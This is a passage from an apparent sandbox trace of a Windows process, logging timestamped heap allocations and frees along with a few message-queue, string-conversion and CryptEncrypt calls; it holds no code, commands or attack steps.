Flags=0x0, Size=0x4) returned 0x2e54e38 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0132.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0132.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0132.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0132.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0132.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0132.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0132.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0132.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0132.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0132.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0132.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0132.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0132.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0132.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0132.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0132.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0132.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0132.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0132.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0132.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0132.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0132.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0132.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0132.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0132.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0132.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0132.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e509e0 [0132.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0132.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0132.380] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0132.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54120 [0132.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0132.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0132.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0132.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0132.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0132.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0132.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0132.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0132.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0132.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0132.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0132.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0132.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0132.381] CryptEncrypt (in: hKey=0xa875d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1309, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x1310) returned 1 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0132.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0132.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0132.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0132.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0132.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0132.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0132.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0132.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0132.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0132.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0132.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0132.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0132.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0132.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0132.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0132.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0132.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0132.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0132.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0132.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0132.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0132.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0132.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0132.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0132.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0132.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0132.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0132.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0132.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0132.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0132.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0132.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0132.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0132.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0132.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0132.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0132.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0132.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0132.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0132.387] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0132.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0132.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0132.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0132.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0132.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0132.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0132.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0132.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0132.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0132.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0132.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0132.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0132.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0132.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0132.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0132.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0132.389] CharLowerBuffW (in: lpsz="byte[4880]", cchLength=0xa | out: lpsz="byte[4880]") returned 0xa [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0132.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0132.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.390] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.579] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.579] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0132.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.580] WideCharToMultiByte (in: 